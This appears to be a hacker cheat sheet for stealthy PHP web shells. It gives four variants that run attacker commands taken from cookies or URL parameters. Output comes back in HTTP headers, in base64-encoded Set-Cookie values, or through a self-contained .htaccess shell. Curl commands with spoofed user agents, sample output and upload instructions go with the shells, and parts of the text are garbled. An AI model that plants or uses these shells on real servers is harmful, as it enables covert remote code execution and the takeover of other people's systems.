1 -> Using cookie
<?php @header(’Hidden-Field: '.@exec($_COOKIE['cmd'])); echo "<p>hello</p>"; ?>
3xample.
curl ‘http://target/cookie.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’
2 -> Using HTTP Headers
<?php @header(’Hidden-Field: '.@exec($_COOKIE['cmd'])); echo "<p>hello</p>"; ?>
3xample.
curl -v ‘http://target/headers.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’
output
HTTP/1.1 200 OK! Date: Wed, 06 Jun 2011 11:23:18 GMT! Server: Apache DAV/2 PHP/5.3.1!X-Powered-By: PHP/5.3.1! Hidden-Field: uid=20(nobody) gid=20(nobody) groups=20(nobody)! Content-Type: text/html
3 -> Base 64 Encode
<?php if(isset($_COOKIE)) @header('Set-Cookie: PHPSESSID='.@base64_encode(@exec($_COOKIE ['cmd']))); echo "<p>pown</p>"; ?>
3xample.
curl -v ‘http://target/base64.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’ -D shellog
Output;
HTTP/1.1 200 OK! Date: Wed, 06 Jun 2011 11:23:18 GMT! Server: Apache DAV/2 PHP/5.3.1!X-Powered-By: PHP/5.3.1! Set-Cookie: PHPSESSID=dWlkPTcwKF93d3cpIGdpZD03MChfd3d3KSBncm91cHM9NzAoX3d3dyksMTAxKG NvbS5hcHBsZS5zaGFyZXBvaW50Lmdyb3VwLjEpLDYxKGxvY2FsYWNjb3VudHMpLDEyKGV2Z XJ5b25lKSw0MDIoY29tLmFwcGxlLnNoYXJlcG9pbnQuZ3JvdXAuMyksMTAyKGNvbS5hcHBsZS 5zaGFyZXBvaW50Lmdyb3VwLjIp Content-Length: 12! Content-Type: text/html!
Offline Base64 Decode;
shell$python -c ‘import base64, sys; print base64.decodestring(sys.argv[1]);’ `cat shellog|grep ^Set-Cookie|cut -d ‘=’ -f 2`! uid=20(nobody) gid=20(nobody) groups=20(nobody)
4 -> With Htaccess
# Self contained .htaccess web shell - Part of the htshell project # Written by Wireghoul - http://www.justanotherhacker.com # Override default deny rule to make .htaccess file accessible over web Order allow,deny Allow from all # Make .htaccess file be interpreted as php file. This occur after apache has interpreted # the apache directoves from the .htaccess file AddType application/x-httpd-php .htaccess ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain.tld/path/.htaccess?c=command for remote code execution.
nano /etc/httpd/conf/httpd.conf
<Directory /var/www/> Options Indexes FollowSymLinks MultiViews AllowOverride All Order allow,deny allow from all </Directory>
restart the web server apache.
you can modify the code)
More to see here: https://github.com/wireghoul/htshells